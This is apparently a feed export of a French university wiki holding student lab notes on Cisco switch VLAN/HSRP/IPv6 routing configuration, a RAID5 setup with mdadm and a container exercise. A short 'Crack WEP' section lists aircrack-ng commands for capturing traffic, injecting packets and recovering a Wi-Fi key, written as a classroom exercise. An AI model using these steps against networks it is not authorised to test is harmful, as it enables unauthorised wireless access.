 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vérifications du fonctionnement ====&lt;br /&gt;
&lt;br /&gt;
===== show running-config =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
===== Show Interface status =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
===== IPv6 =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
===== IPv4 =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
===Sécurisation des données via RAID5===&lt;br /&gt;
====Les partitions====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
====Création du RAID====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
===Sécurisation Wifi par WPA2-EAP===&lt;br /&gt;
&lt;br /&gt;
Suite à une erreur de manipulation le /var est mort&lt;br /&gt;
&lt;br /&gt;
Pour réaliser la suite du TP j'ai recrée une VM Dionysos2, même addresse IP.&lt;br /&gt;
&lt;br /&gt;
Il faut donc éteindre la VM Dionysos pour éviter tout problème&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Crack WEP===&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Jdqb_aircrack.png&amp;diff=48952</id>
		<title>Fichier:Jdqb aircrack.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Jdqb_aircrack.png&amp;diff=48952"/>
				<updated>2018-12-17T18:47:43Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=48951</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=48951"/>
				<updated>2018-12-17T18:44:17Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Crack WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
